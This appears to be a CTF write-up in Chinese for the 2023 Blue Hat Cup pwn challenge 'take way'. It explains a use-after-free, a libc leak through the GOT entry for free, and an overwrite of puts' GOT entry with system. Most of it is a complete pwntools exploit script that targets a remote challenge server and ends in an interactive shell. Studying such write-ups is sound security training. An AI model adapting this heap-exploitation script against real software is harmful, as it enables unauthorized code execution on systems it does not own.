[蓝帽杯 2023]take way WriteUp

Qanux 2023-10-26 00:56:12

delete后指针没有置空,存在UAF漏洞

先把限制chunk构建次数的5改大,然后泄露free_got来泄露libc地址,最后改puts的got表改为system

直接把chunk malloc到got表会直接EOF,所以选择malloc到got区域上面的2个数字为0的区域(超级麻烦,求求更加简便的做法)
Untitled.png
* exp:

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack

# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/ld-2.31.so", "./takeway"],
#             env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so"})
# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/ld-2.27.so", "./takeway"],
#             env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6"})
# gdb.attach(p)

p=remote('101.200.234.115', 43104)
# p=process('./takeway')
context(arch='arm64', os='linux', log_level='debug')
elf=ELF('./takeway')
# libc=ELF('/mnt/d/desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')

def add(index,name,content):
    p.recvuntil('Please input your choose: ')
    p.sendline(b'1')
    p.sendline(str(index))
    p.recvuntil('Please input your food name: ')
    p.sendline(name)
    p.recvuntil('remark: ')
    p.send(content)

def rename(index,new_name):
    p.recvuntil('Please input your choose: ')
    p.sendline(b'3')
    p.recvuntil('Please input index: ')
    p.sendline(str(index))
    p.recvuntil('New food name is: ')
    p.sendline(new_name)

def delete(index):
    p.recvuntil('Please input your choose: ')
    p.sendline(b'2')
    p.recvuntil('Please input your order index: ')
    p.sendline(str(index))

add(0,b'aaaa',b'/bin/sh\x00')
add(1,b'bbbb',b'/bin/sh\x00')

delete(0)
delete(1)
rename(1,p64(0x404088-0x8))
add(2,b'aaaa',b'aaaa')
add(3,b'6666',b'60')

add(4,b'bbbb',b'/bin/sh\x00')
add(100,b'bbbb',b'/bin/sh\x00')
delete(4)
delete(100)
rename(100,p64(0x404008))
add(101,b'bbbb',b'/bin/sh\x00')
add(102,b'aaaa',b'aaaaaaaa')

p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(102))
p.recvuntil('order is: ')
p.recvuntil('aaaaaaaa')
free_addr=u64(p.recv(6).ljust(8,b'\x00')) 
print("free_addr =",hex(free_addr))
p.recvuntil('New food name is: ')
p.sendline(b'1')

libc = LibcSearcher('free',free_addr)
libc_base=free_addr-libc.dump('free')
system=libc_base+libc.dump('system')

add(103,b'bbbb',b'/bin/sh\x00')
add(104,b'bbbb',b'/bin/sh\x00')
delete(103)
delete(104)
rename(104,p64(0x404010))
add(105,b'bbbb',b'/bin/sh\x00')
add(106,b'aaaa',p64(free_addr)+p64(system))

p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(106))

p.interactive()

评论

Qanux

pwn新手,不断追求变强

twitter weibo github wechat

随机分类

XSS 文章:34 篇
iOS安全 文章:36 篇
渗透测试 文章:154 篇
SQL注入 文章:39 篇
PHP安全 文章:45 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

H

HHHeey

好的,谢谢师傅的解答

Article_kelp

a类中的变量secret_class_var = "secret"是在merge

H

HHHeey

secret_var = 1 def test(): pass

目录